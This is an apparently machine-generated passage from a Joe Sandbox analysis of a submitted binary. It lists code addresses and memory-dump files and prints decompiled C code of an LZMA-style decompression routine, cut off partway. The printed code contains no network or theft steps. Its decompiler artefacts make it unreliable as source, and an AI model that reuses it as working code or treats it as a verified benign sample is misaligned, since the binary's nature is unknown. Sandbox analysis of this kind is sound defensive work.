0x00406ddd
0x00406ddd
0x00406de0
0x00000000
0x00406de0
0x00406e41
0x00406e41
0x00406e44
0x00406e47
0x00406e4a
0x00406e4d
0x00406e50
0x00406e53
0x00406e56
0x00406e59
0x00406e5c
0x00406e5f
0x00406e77
0x00406e7a
0x00406e7d
0x00406e80
0x00406e80
0x00406e83
0x00406e87
0x00406e89
0x00406e61
0x00406e61
0x00406e69
0x00406e6e
0x00406e70
0x00406e72
0x00406e72
0x00406e8c
0x00406e93
0x00406e96
0x00000000
0x00406e98
0x00000000
0x00406e98
0x00000000
0x00407125
0x00407125
0x00407129
0x00407450
0x00000000
0x00407450
0x0040712f
0x00407132
0x00407135
0x00407139
0x0040713c
0x00407142
0x00407144
0x00407144
0x00407144
0x00407147
0x00000000
0x00000000
0x00000000
0x00000000
0x00407234
0x00407238
0x0040725a
0x0040725d
0x00407267
0x00000000
0x00407267
0x0040723a
0x0040723d
0x00407241
0x00407244
0x00407244
0x00407247
0x00000000
0x00000000
0x004072f1
0x004072f5
0x00407313
0x00407313
0x00407313
0x0040731a
0x00407321
0x00407328
0x00407328
0x00000000
0x00407328
0x004072f7
0x004072fa
0x004072fd
0x00407300
0x00407307
0x0040724b
0x0040724b
0x0040724e
0x00000000
0x00000000
0x004073e2
0x004073e5
0x00000000
0x00000000
0x0040701c
0x0040701e
0x00407025
0x00407026
0x00407028
0x0040702b
0x00000000
0x00000000
0x00407033
0x00407036
0x00407039
0x0040703b
0x0040703d
0x0040703d
0x0040703e
0x00407041
0x00407048
0x0040704b
0x00407059
0x00000000
0x00000000
0x0040732f
0x0040732f
0x00407332
0x00407339
0x00000000
0x00000000
0x0040733e
0x0040733e
0x00407342
0x0040747a
0x00000000
0x0040747a
0x00407348
0x0040734b
0x0040734e
0x00407352
0x00407355
0x0040735b
0x0040735d
0x0040735d
0x0040735d
0x00407360
0x00407363
0x00407363
0x00407363
0x00407363
0x00407366
0x00407366
0x0040736a
0x004073ca
0x004073cd
0x004073d2
0x004073d3
0x004073d5
0x004073d7
0x004073da
0x00000000
0x004073da
0x0040736c
0x00407372
0x00407375
0x00407378
0x0040737b
0x0040737e
0x00407381
0x00407384
0x00407387
0x0040738a
0x0040738d
0x004073a6
0x004073a9
0x004073ac
0x004073af
0x004073b3
0x004073b5
0x004073b5
0x004073b6
0x004073b9
0x0040738f
0x0040738f
0x00407397
0x0040739c
0x0040739e
0x004073a1
0x004073a1
0x004073bc
0x004073c3
0x00000000
0x004073c5
0x00000000
0x004073c5
0x00000000
0x00407061
0x00407064
0x0040709a
0x004071ca
0x004071ca
0x004071ca
0x004071ca
0x004071cd
0x004071cd
0x004071d0
0x004071d2
0x0040745c
0x00000000
0x0040745c
0x004071d8
0x004071db
0x00000000
0x00000000
0x004071e1
0x004071e5
0x004071e8
0x004071e8
0x004071e8
0x00000000
0x004071e8
0x00407066
0x00407068
0x0040706a
0x0040706c
0x0040706f
0x00407070
0x00407072
0x00407074
0x00407077
0x0040707a
0x00407090
0x00407095
0x004070cd
0x004070cd
0x004070d1
0x004070fd
0x004070ff
0x00407106
0x00407109
0x0040710c
0x0040710c
0x00407111
0x00407111
0x00407113
0x00407116
0x0040711d
0x00407120
0x0040714d
0x0040714d
0x00407150
0x00407153
0x004071c7
0x004071c7
0x004071c7
0x00000000
0x004071c7
0x00407155
0x0040715b
0x0040715e
0x00407161
0x00407164
0x00407167
0x0040716a
0x0040716d
0x00407170
0x00407173
0x00407176
0x0040718f
0x00407191
0x00407194
0x00407195
0x00407198
0x0040719a
0x0040719d
0x0040719f
0x004071a1
0x004071a4
0x004071a6
0x004071a9
0x004071ad
0x004071af
0x004071af
0x004071b0
0x004071b3
0x004071b6
0x00407178
0x00407178
0x00407180
0x00407185
0x00407187
0x0040718a
0x0040718a
0x004071b9
0x004071c0
0x0040714a
0x0040714a
0x0040714a
0x0040714a
0x00000000
0x004071c2
0x00000000
0x004071c2
0x004071c0
0x004070d3
0x004070d6
0x004070d8
0x004070db
0x004070de
0x004070e1
0x004070e3
0x004070e6
0x004070e9
0x004070e9
0x004070ec
0x004070ec
0x004070ef
0x004070f6
0x004070ca
0x004070ca
0x004070ca
0x004070ca
0x00000000
0x004070f8
0x00000000
0x004070f8
0x004070f6
0x0040707c
0x0040707f
0x00407081
0x00407084
0x00000000
0x00000000
0x00406de3
0x00406de3
0x00406de7
0x0040742c
0x00000000
0x0040742c
0x00406ded
0x00406df0
0x00406df3
0x00406df6
0x00406df9
0x00406dfc
0x00406dff
0x00406e01
0x00406e04
0x00406e07
0x00406e0a
0x00406e0c
0x00406e0c
0x00406e0c
0x00000000
0x00000000
0x00000000
0x00000000
0x004071eb
0x004071eb
0x004071eb
0x004071ef
0x00000000
0x00000000
0x004071f5
0x004071f8
0x004071fb
0x004071fe
0x00407200
0x00407200
0x00407200
0x00407203
0x00407206
0x00407209
0x0040720c
0x0040720f
0x00407212
0x00407213
0x00407215
0x00407215
0x00407215
0x00407218
0x0040721b
0x0040721e
0x00407221
0x00407224
0x00407228
0x0040722a
0x0040722d
0x00000000
0x0040722f
0x00000000
0x0040722f
0x0040722d
0x00407462
0x00000000
0x00000000
0x00406a91

Memory Dump Source

Source File: 00000000.00000002.771758418.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.771749416.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.771772921.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.771779733.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.771816294.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.771822433.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.771834497.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.771843257.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.771862430.00000000004C1000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_3GJ6S3Kwnb.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9f6913e564211b9dd699f70e6d1786715247b17c51318714e26b7cf31b51a489
Instruction ID: 00773887ea3243dfb52df8404d42644f62a25abb174058b9e5a1e26f950428c6
Opcode Fuzzy Hash: 9f6913e564211b9dd699f70e6d1786715247b17c51318714e26b7cf31b51a489
Instruction Fuzzy Hash: 27813671D04229CFDF24CFA8C8847ADBBB1FB44305F24816AD856BB281C7786A86DF55

Uniqueness

Uniqueness Score: -1.00%

Function 00406A4F Relevance: 5.2, APIs: 4, Instructions: 198
COMMON

Download Yara Rule

C-Code - Quality: 98%

			E00406A4F(void* __ecx) {
				void* _v8;
				void* _v12;
				signed int _v16;
				unsigned int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				signed int _v44;
				signed int _v48;
				signed int _v52;
				signed int _v56;
				signed int _v60;
				signed int _v64;
				signed int _v68;
				signed int _v72;
				signed int _v76;
				signed int _v80;
				signed int _v84;
				signed int _v88;
				signed int _v92;
				signed int _v95;
				signed int _v96;
				signed int _v100;
				signed int _v104;
				signed int _v108;
				signed int _v112;
				signed int _v116;
				signed int _v120;
				intOrPtr _v124;
				signed int _v128;
				signed int _v132;
				signed int _v136;
				void _v140;
				void* _v148;
				signed int _t537;
				signed int _t538;
				signed int _t572;

				_t572 = 0x22;
				_v148 = __ecx;
				memcpy( &_v140, __ecx, _t572 << 2);
				if(_v52 == 0xffffffff) {
					return 1;
				}
				while(1) {
					L3:
					_t537 = _v140;
					if(_t537 > 0x1c) {
						break;
					}
					switch( *((intOrPtr*)(_t537 * 4 +  &M004074A1))) {
						case 0:
							__eflags = _v112;
							if(_v112 == 0) {
								goto L173;
							}
							_v112 = _v112 - 1;
							_v116 = _v116 + 1;
							_t537 =  *_v116;
							__eflags = _t537 - 0xe1;
							if(_t537 > 0xe1) {
								goto L174;
							}
							_t542 = _t537 & 0x000000ff;
							_push(0x2d);
							asm("cdq");
							_pop(_t576);
							_push(9);
							_pop(_t577);
							_t622 = _t542 / _t576;
							_t544 = _t542 % _t576 & 0x000000ff;
							asm("cdq");
							_t617 = _t544 % _t577 & 0x000000ff;
							_v64 = _t617;
							_v32 = (1 << _t622) - 1;
							_v28 = (1 << _t544 / _t577) - 1;
							_t625 = (0x300 << _t617 + _t622) + 0x736;
							__eflags = 0x600 - _v124;
							if(0x600 == _v124) {
								L12:
								__eflags = _t625;
								if(_t625 == 0) {
									L14:
									_v76 = _v76 & 0x00000000;
									_v68 = _v68 & 0x00000000;
									goto L17;
								} else {
									goto L13;
								}
								do {
									L13:
									_t625 = _t625 - 1;
									__eflags = _t625;
									 *((short*)(_v8 + _t625 * 2)) = 0x400;
								} while (_t625 != 0);
								goto L14;
							}
							__eflags = _v8;
							if(_v8 != 0) {
								GlobalFree(_v8); // executed
							}
							_t537 = GlobalAlloc(0x40, 0x600); // executed
							__eflags = _t537;
							_v8 = _t537;
							if(_t537 == 0) {
								goto L174;
							} else {
								_v124 = 0x600;
								goto L12;
							}
						case 1:
							L15:
							__eflags = _v112;
							if(_v112 == 0) {
								_v140 = 1;
								goto L173;
							}
							_v112 = _v112 - 1;
							_v68 = _v68 | ( *_v116 & 0x000000ff) << _v76 << 0x00000003;
							_v116 = _v116 + 1;
							_t50 =  &_v76;
							 *_t50 = _v76 + 1;
							__eflags =  *_t50;
							L17:
							__eflags = _v76 - 4;
							if(_v76 < 4) {
								goto L15;
							}
							_t550 = _v68;
							__eflags = _t550 - _v120;
							if(_t550 == _v120) {
								L22:
								_v76 = 5;
								 *(_v12 + _v120 - 1) =  *(_v12 + _v120 - 1) & 0x00000000;
								goto L25;
							}
							__eflags = _v12;
							_v120 = _t550;
							if(_v12 != 0) {
								GlobalFree(_v12); // executed
							}
							_t537 = GlobalAlloc(0x40, _v68); // executed
							__eflags = _t537;
							_v12 = _t537;
							if(_t537 == 0) {
								goto L174;
							} else {
								goto L22;
							}
						case 2:
							L26:
							_t557 = _v100 & _v32;
							_v136 = 6;
							_v80 = _t557;
							_t626 = _v8 + ((_v60 << 4) + _t557) * 2;
							goto L135;
						case 3:
							L23:
							__eflags = _v112;
							if(_v112 == 0) {
								_v140 = 3;
								goto L173;
							}
							_v112 = _v112 - 1;
							_t72 =  &_v116;
							 *_t72 = _v116 + 1;
							__eflags =  *_t72;
							_v16 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
							L25:
							_v76 = _v76 - 1;
							__eflags = _v76;
							if(_v76 != 0) {
								goto L23;
							}
							goto L26;
						case 4:
							L136:
							_t559 =  *_t626;
							_t610 = _t559 & 0x0000ffff;
							_t591 = (_v20 >> 0xb) * _t610;
							__eflags = _v16 - _t591;
							if(_v16 >= _t591) {
								_v20 = _v20 - _t591;
								_v16 = _v16 - _t591;
								_v68 = 1;
								_t560 = _t559 - (_t559 >> 5);
								__eflags = _t560;
								 *_t626 = _t560;
							} else {
								_v20 = _t591;
								_v68 = _v68 & 0x00000000;
								 *_t626 = (0x800 - _t610 >> 5) + _t559;
							}
							__eflags = _v20 - 0x1000000;
							if(_v20 >= 0x1000000) {
								goto L142;
							} else {
								goto L140;
							}
						case 5:
							L140:
							__eflags = _v112;
							if(_v112 == 0) {
								_v140 = 5;
								goto L173;
							}
							_v20 = _v20 << 8;
							_v112 = _v112 - 1;
							_t464 =  &_v116;
							 *_t464 = _v116 + 1;
							__eflags =  *_t464;
							_v16 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
							L142:
							_t561 = _v136;
							goto L143;
						case 6:
							__edx = 0;
							__eflags = _v68;
							if(_v68 != 0) {
								__eax = _v8;
								__ecx = _v60;
								_v56 = 1;
								_v136 = 7;
								__esi = _v8 + 0x180 + _v60 * 2;
								goto L135;
							}
							__eax = _v96 & 0x000000ff;
							__esi = _v100;
							__cl = 8;
							__cl = 8 - _v64;
							__esi = _v100 & _v28;
							__eax = (_v96 & 0x000000ff) >> 8;
							__ecx = _v64;
							__esi = (_v100 & _v28) << 8;
							__ecx = _v8;
							((_v96 & 0x000000ff) >> 8) + ((_v100 & _v28) << 8) = ((_v96 & 0x000000ff) >> 8) + ((_v100 & _v28) << 8) + (((_v96 & 0x000000ff) >> 8) + ((_v100 & _v28) << 8)) * 2;
							__eax = ((_v96 & 0x000000ff) >> 8) + ((_v100 & _v28) << 8) + (((_v96 & 0x000000ff) >> 8) + ((_v100 & _v28) << 8)) * 2 << 9;
							__eflags = _v60 - 4;
							__eax = (((_v96 & 0x000000ff) >> 8) + ((_v100 & _v28) << 8) + (((_v96 & 0x000000ff) >> 8) + ((_v100 & _v28) << 8)) * 2 << 9) + _v8 + 0xe6c;
							_v92 = (((_v96 & 0x000000ff) >> 8) + ((_v100 & _v28) << 8) + (((_v96 & 0x000000ff) >> 8) + ((_v100 & _v28) << 8)) * 2 << 9) + _v8 + 0xe6c;
							if(_v60 >= 4) {
								__eflags = _v60 - 0xa;
								if(_v60 >= 0xa) {
									_t103 =  &_v60;
									 *_t103 = _v60 - 6;
									__eflags =  *_t103;
								} else {
									_v60 = _v60 - 3;
								}
							} else {
								_v60 = 0;
							}
							__eflags = _v56 - __edx;
							if(_v56 == __edx) {
								__ebx = 0;
								__ebx = 1;
								goto L63;
							}
							__eax = _v24;
							__eax = _v24 - _v48;
							__eflags = __eax - _v120;
							if(__eax >= _v120) {
								__eax = __eax + _v120;
								__eflags = __eax;
							}
							__ecx = _v12;
							__ebx = 0;
							__ebx = 1;
							__al =  *((intOrPtr*)(__eax + __ecx));
							_v95 =  *((intOrPtr*)(__eax + __ecx));
							goto L43;
						case 7:
							__eflags = _v68 - 1;
							if(_v68 != 1) {
								__eax = _v40;
								_v132 = 0x16;
								_v36 = _v40;
								__eax = _v44;
								_v40 = _v44;
								__eax = _v48;
								_v44 = _v48;
								__eax = 0;
								__eflags = _v60 - 7;
								0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
								__al = __al & 0x000000fd;
								__eax = (__eflags >= 0) - 1 + 0xa;
								_v60 = (__eflags >= 0) - 1 + 0xa;
								__eax = _v8;
								__eax = _v8 + 0x664;
								__eflags = __eax;
								_v92 = __eax;
								goto L71;
							}
							__eax = _v8;
							__ecx = _v60;
							_v136 = 8;
							__esi = _v8 + 0x198 + _v60 * 2;
							goto L135;
						case 8:
							__eflags = _v68;
							if(_v68 != 0) {
								__eax = _v8;
								__ecx = _v60;
								_v136 = 0xa;
								__esi = _v8 + 0x1b0 + _v60 * 2;
							} else {
								__eax = _v60;
								__ecx = _v8;
								__eax = _v60 + 0xf;
								_v136 = 9;
								_v60 + 0xf << 4 = (_v60 + 0xf << 4) + _v80;
								__esi = _v8 + ((_v60 + 0xf << 4) + _v80) * 2;
							}
							goto L135;
						case 9:
							__eflags = _v68;
							if(_v68 != 0) {
								goto L92;
							}
							__eflags = _v100;
							if(_v100 == 0) {
								goto L174;
							}
							__eax = 0;
							__eflags = _v60 - 7;
							_t264 = _v60 - 7 >= 0;
							__eflags = _t264;
							0 | _t264 = _t264 + _t264 + 9;
							_v60 = _t264 + _t264 + 9;
							goto L78;
						case 0xa:
							__eflags = _v68;
							if(_v68 != 0) {
								__eax = _v8;
								__ecx = _v60;
								_v136 = 0xb;
								__esi = _v8 + 0x1c8 + _v60 * 2;
								goto L135;
							}
							__eax = _v44;
							goto L91;
						case 0xb:
							__eflags = _v68;
							if(_v68 != 0) {
								__ecx = _v40;
								__eax = _v36;
								_v36 = _v40;
							} else {
								__eax = _v40;
							}
							__ecx = _v44;
							_v40 = _v44;
							L91:
							__ecx = _v48;
							_v48 = __eax;
							_v44 = _v48;
							L92:
							__eax = _v8;
							_v132 = 0x15;
							__eax = _v8 + 0xa68;
							_v92 = _v8 + 0xa68;
							goto L71;
						case 0xc:
							L102:
							__eflags = _v112;
							if(_v112 == 0) {
								_v140 = 0xc;
								goto L173;
							}
							__ecx = _v116;
							__eax = _v16;
							_v20 = _v20 << 8;
							__ecx =  *_v116 & 0x000000ff;
							_v112 = _v112 - 1;
							_v16 << 8 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
							_t340 =  &_v116;
							 *_t340 = _v116 + 1;
							__eflags =  *_t340;
							_v16 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
							__eax = _v48;
							goto L104;
						case 0xd:
							L39:
							__eflags = _v112;
							if(_v112 == 0) {
								_v140 = 0xd;
								goto L173;
							}
							__ecx = _v116;
							__eax = _v16;
							_v20 = _v20 << 8;
							__ecx =  *_v116 & 0x000000ff;
							_v112 = _v112 - 1;
							_v16 << 8 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
							_t127 =  &_v116;
							 *_t127 = _v116 + 1;
							__eflags =  *_t127;
							_v16 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
							L41:
							__eax = _v68;
							__eflags = _v76 - _v68;
							if(_v76 != _v68) {
								goto L50;
							}
							__eflags = __ebx - 0x100;
							if(__ebx >= 0x100) {
								goto L56;
							}
							L43:
							__eax = _v95 & 0x000000ff;
							_v95 = _v95 << 1;
							__ecx = _v92;
							__eax = (_v95 & 0x000000ff) >> 7;
							_v76 = __eax;
							__eax = __eax + 1;
							__eax = __eax << 8;
							__eax = __eax + __ebx;
							__esi = _v92 + __eax * 2;
							_v20 = _v20 >> 0xb;
							__ax =  *__esi;
							_v88 = __esi;
							__edx = __ax & 0x0000ffff;
							__ecx = (_v20 >> 0xb) * __edx;
							__eflags = _v16 - __ecx;
							if(_v16 >= __ecx) {
								_v20 = _v20 - __ecx;
								_v16 = _v16 - __ecx;
								__cx = __ax;
								_v68 = 1;
								__cx = __ax >> 5;
								__eflags = __eax;
								__ebx = __ebx + __ebx + 1;
								 *__esi = __ax;
							} else {
								_v68 = _v68 & 0x00000000;
								_v20 = __ecx;
								0x800 = 0x800 - __edx;
								0x800 - __edx >> 5 = (0x800 - __edx >> 5) + __eax;
								__ebx = __ebx + __ebx;
								 *__esi = __cx;
							}
							__eflags = _v20 - 0x1000000;
							_v72 = __ebx;
							if(_v20 >= 0x1000000) {
								goto L41;
							} else {
								goto L39;
							}
						case 0xe:
							L48:
							__eflags = _v112;
							if(_v112 == 0) {
								_v140 = 0xe;
								goto L173;
							}
							__ecx = _v116;
							__eax = _v16;
							_v20 = _v20 << 8;
							__ecx =  *_v116 & 0x000000ff;
							_v112 = _v112 - 1;
							_v16 << 8 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
							_t161 =  &_v116;
							 *_t161 = _v116 + 1;
							__eflags =  *_t161;
							_v16 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
							while(1) {
								L50:
								__eflags = __ebx - 0x100;
								if(__ebx >= 0x100) {
									break;
								}
								__eax = _v92;
								__edx = __ebx + __ebx;
								__ecx = _v20;
								__esi = __edx + __eax;
								__ecx = _v20 >> 0xb;
								__ax =  *__esi;
								_v88 = __esi;
								__edi = __ax & 0x0000ffff;
								__ecx = (_v20 >> 0xb) * __edi;
								__eflags = _v16 - __ecx;
								if(_v16 >= __ecx) {
									_v20 = _v20 - __ecx;
									_v16 = _v16 - __ecx;
									__cx = __ax;
									_t175 = __edx + 1; // 0x1
									__ebx = _t175;
									__cx = __ax >> 5;
									__eflags = __eax;
									 *__esi = __ax;
								} else {
									_v20 = __ecx;
									0x800 = 0x800 - __edi;
									0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
									__ebx = __ebx + __ebx;
									 *__esi = __cx;
								}
								__eflags = _v20 - 0x1000000;
								_v72 = __ebx;
								if(_v20 >= 0x1000000) {
									continue;
								} else {
									goto L48;
								}
							}
							L56:
							_t178 =  &_v56;
							 *_t178 = _v56 & 0x00000000;
							__eflags =  *_t178;
							goto L57;
						case 0xf:
							L60:
							__eflags = _v112;
							if(_v112 == 0) {
								_v140 = 0xf;
								goto L173;
							}
							__ecx = _v116;
							__eax = _v16;
							_v20 = _v20 << 8;
							__ecx =  *_v116 & 0x000000ff;
							_v112 = _v112 - 1;
							_v16 << 8 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
							_t208 =  &_v116;
							 *_t208 = _v116 + 1;
							__eflags =  *_t208;
							_v16 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
							L62:
							__eflags = __ebx - 0x100;
							if(__ebx >= 0x100) {
								L57:
								__al = _v72;
								_v96 = _v72;
								goto L58;
							}
							L63:
							__eax = _v92;
							__edx = __ebx + __ebx;
							__ecx = _v20;
							__esi = __edx + __eax;
							__ecx = _v20 >> 0xb;
							__ax =  *__esi;
							_v88 = __esi;
							__edi = __ax & 0x0000ffff;
							__ecx = (_v20 >> 0xb) * __edi;
							__eflags = _v16 - __ecx;
							if(_v16 >= __ecx) {
								_v20 = _v20 - __ecx;
								_v16 = _v16 - __ecx;
								__cx = __ax;
								_t222 = __edx + 1; // 0x1
								__ebx = _t222;
								__cx = __ax >> 5;
								__eflags = __eax;
								 *__esi = __ax;
							} else {
								_v20 = __ecx;
								0x800 = 0x800 - __edi;
								0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
								__ebx = __ebx + __ebx;
								 *__esi = __cx;
							}
							__eflags = _v20 - 0x1000000;
							_v72 = __ebx;
							if(_v20 >= 0x1000000) {
								goto L62;
							} else {
								goto L60;
							}
						case 0x10:
							L112:
							__eflags = _v112;
							if(_v112 == 0) {
								_v140 = 0x10;
								goto L173;
							}
							__ecx = _v116;
							__eax = _v16;
							_v20 = _v20 << 8;
							__ecx =  *_v116 & 0x000000ff;
							_v112 = _v112 - 1;
							_v16 << 8 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
							_t371 =  &_v116;
							 *_t371 = _v116 + 1;
							__eflags =  *_t371;
							_v16 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
							goto L114;
						case 0x11:
							L71:
							__esi = _v92;
							_v136 = 0x12;
							goto L135;
						case 0x12:
							__eflags = _v68;
							if(_v68 != 0) {
								__eax = _v92;
								_v136 = 0x13;
								__esi = _v92 + 2;
								L135:
								_v88 = _t626;
								goto L136;
							}
							__eax = _v80;
							_v52 = _v52 & 0x00000000;
							__ecx = _v92;
							__eax = _v80 << 4;
							__eflags = __eax;
							__eax = _v92 + __eax + 4;
							goto L133;
						case 0x13:
							__eflags = _v68;
							if(_v68 != 0) {
								_t475 =  &_v92;
								 *_t475 = _v92 + 0x204;
								__eflags =  *_t475;
								_v52 = 0x10;
								_v68 = 8;
								L147:
								_v128 = 0x14;
								goto L148;
							}
							__eax = _v80;
							__ecx = _v92;
							__eax = _v80 << 4;
							_v52 = 8;
							__eax = _v92 + (_v80 << 4) + 0x104;
							L133:
							_v92 = __eax;
							_v68 = 3;
							goto L147;
						case 0x14:
							_v52 = _v52 + __ebx;
							__eax = _v132;
							goto L143;
						case 0x15:
							__eax = 0;
							__eflags = _v60 - 7;
							0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
							__al = __al & 0x000000fd;
							__eax = (__eflags >= 0) - 1 + 0xb;
							_v60 = (__eflags >= 0) - 1 + 0xb;
							goto L123;
						case 0x16:
							__eax = _v52;
							__eflags = __eax - 4;
							if(__eax >= 4) {
								_push(3);
								_pop(__eax);
							}
							__ecx = _v8;
							_v68 = 6;
							__eax = __eax << 7;
							_v128 = 0x19;
							_v92 = __eax;
							goto L148;
						case 0x17:
							L148:
							__eax = _v68;
							_v84 = 1;
							_v76 = _v68;
							goto L152;
						case 0x18:
							L149:
							__eflags = _v112;
							if(_v112 == 0) {
								_v140 = 0x18;
								goto L173;
							}
							__ecx = _v116;
							__eax = _v16;
							_v20 = _v20 << 8;
							__ecx =  *_v116 & 0x000000ff;
							_v112 = _v112 - 1;
							_v16 << 8 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
							_t490 =  &_v116;
							 *_t490 = _v116 + 1;
							__eflags =  *_t490;
							_v16 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
							L151:
							_t493 =  &_v76;
							 *_t493 = _v76 - 1;
							__eflags =  *_t493;
							L152:
							__eflags = _v76;
							if(_v76 <= 0) {
								__ecx = _v68;
								__ebx = _v84;
								0 = 1;
								__eax = 1 << __cl;
								__ebx = _v84 - (1 << __cl);
								__eax = _v128;
								_v72 = __ebx;
								L143:
								_v140 = _t561;
								goto L3;
							}
							__eax = _v84;
							_v20 = _v20 >> 0xb;
							__edx = _v84 + _v84;
							__eax = _v92;
							__esi = __edx + __eax;
							_v88 = __esi;
							__ax =  *__esi;
							__edi = __ax & 0x0000ffff;
							__ecx = (_v20 >> 0xb) * __edi;
							__eflags = _v16 - __ecx;
							if(_v16 >= __ecx) {
								_v20 = _v20 - __ecx;
								_v16 = _v16 - __ecx;
								__cx = __ax;
								__cx = __ax >> 5;
								__eax = __eax - __ecx;
								__edx = __edx + 1;
								__eflags = __edx;
								 *__esi = __ax;
								_v84 = __edx;
							} else {
								_v20 = __ecx;
								0x800 = 0x800 - __edi;
								0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
								_v84 = _v84 << 1;
								 *__esi = __cx;
							}
							__eflags = _v20 - 0x1000000;
							if(_v20 >= 0x1000000) {
								goto L151;
							} else {
								goto L149;
							}
						case 0x19:
							__eflags = __ebx - 4;
							if(__ebx < 4) {
								_v48 = __ebx;
								L122:
								_t399 =  &_v48;
								 *_t399 = _v48 + 1;
								__eflags =  *_t399;
								L123:
								__eax = _v48;
								__eflags = __eax;
								if(__eax == 0) {
									_v52 = _v52 | 0xffffffff;
									goto L173;
								}
								__eflags = __eax - _v100;
								if(__eax > _v100) {
									goto L174;
								}
								_v52 = _v52 + 2;
								__eax = _v52;
								_t406 =  &_v100;
								 *_t406 = _v100 + _v52;
								__eflags =  *_t406;
								goto L126;
							}
							__ecx = __ebx;
							__eax = __ebx;
							__ecx = __ebx >> 1;
							__eax = __ebx & 0x00000001;
							__ecx = (__ebx >> 1) - 1;
							__al = __al | 0x00000002;
							__eax = (__ebx & 0x00000001) << __cl;
							__eflags = __ebx - 0xe;
							_v48 = __eax;
							if(__ebx >= 0xe) {
								__ebx = 0;
								_v76 = __ecx;
								L105:
								__eflags = _v76;
								if(_v76 <= 0) {
									__eax = __eax + __ebx;
									_v68 = 4;
									_v48 = __eax;
									__eax = _v8;
									__eax = _v8 + 0x644;
									__eflags = __eax;
									L111:
									__ebx = 0;
									_v92 = __eax;
									_v84 = 1;
									_v72 = 0;
									_v76 = 0;
									L115:
									__eax = _v68;
									__eflags = _v76 - _v68;
									if(_v76 >= _v68) {
										_t397 =  &_v48;
										 *_t397 = _v48 + __ebx;
										__eflags =  *_t397;
										goto L122;
									}
									__eax = _v84;
									_v20 = _v20 >> 0xb;
									__edi = _v84 + _v84;
									__eax = _v92;
									__esi = __edi + __eax;
									_v88 = __esi;
									__ax =  *__esi;
									__ecx = __ax & 0x0000ffff;
									__edx = (_v20 >> 0xb) * __ecx;
									__eflags = _v16 - __edx;
									if(_v16 >= __edx) {
										__ecx = 0;
										_v20 = _v20 - __edx;
										__ecx = 1;
										_v16 = _v16 - __edx;
										__ebx = 1;
										__ecx = _v76;
										__ebx = 1 << __cl;
										__ecx = 1 << __cl;
										__ebx = _v72;
										__ebx = _v72 | __ecx;
										__cx = __ax;
										__cx = __ax >> 5;
										__eax = __eax - __ecx;
										__edi = __edi + 1;
										__eflags = __edi;
										_v72 = __ebx;
										 *__esi = __ax;
										_v84 = __edi;
									} else {
										_v20 = __edx;
										0x800 = 0x800 - __ecx;
										0x800 - __ecx >> 5 = (0x800 - __ecx >> 5) + __eax;
										_v84 = _v84 << 1;
										 *__esi = __dx;
									}
									__eflags = _v20 - 0x1000000;
									if(_v20 >= 0x1000000) {
										L114:
										_t374 =  &_v76;
										 *_t374 = _v76 + 1;
										__eflags =  *_t374;
										goto L115;
									} else {
										goto L112;
									}
								}
								__ecx = _v16;
								__ebx = __ebx + __ebx;
								_v20 = _v20 >> 1;
								__eflags = _v16 - _v20;
								_v72 = __ebx;
								if(_v16 >= _v20) {
									__ecx = _v20;
									_v16 = _v16 - _v20;
									__ebx = __ebx | 0x00000001;
									__eflags = __ebx;
									_v72 = __ebx;
								}
								__eflags = _v20 - 0x1000000;
								if(_v20 >= 0x1000000) {
									L104:
									_t344 =  &_v76;
									 *_t344 = _v76 - 1;
									__eflags =  *_t344;
									goto L105;
								} else {
									goto L102;
								}
							}
							__edx = _v8;
							__eax = __eax - __ebx;
							_v68 = __ecx;
							__eax = _v8 + 0x55e + __eax * 2;
							goto L111;
						case 0x1a:
							L58:
							__eflags = _v104;
							if(_v104 == 0) {
								_v140 = 0x1a;
								goto L173;
							}
							__ecx = _v108;
							__al = _v96;
							__edx = _v12;
							_v100 = _v100 + 1;
							_v108 = _v108 + 1;
							_v104 = _v104 - 1;
							 *_v108 = __al;
							__ecx = _v24;
							 *(_v12 + __ecx) = __al;
							__eax = __ecx + 1;
							__edx = 0;
							_t197 = __eax % _v120;
							__eax = __eax / _v120;
							__edx = _t197;
							goto L82;
						case 0x1b:
							L78:
							__eflags = _v104;
							if(_v104 == 0) {
								_v140 = 0x1b;
								goto L173;
							}
							__eax = _v24;
							__eax = _v24 - _v48;
							__eflags = __eax - _v120;
							if(__eax >= _v120) {
								__eax = __eax + _v120;
								__eflags = __eax;
							}
							__edx = _v12;
							__cl =  *(__edx + __eax);
							__eax = _v24;
							_v96 = __cl;
							 *(__edx + __eax) = __cl;
							__eax = __eax + 1;
							__edx = 0;
							_t280 = __eax % _v120;
							__eax = __eax / _v120;
							__edx = _t280;
							__eax = _v108;
							_v100 = _v100 + 1;
							_v108 = _v108 + 1;
							_t289 =  &_v104;
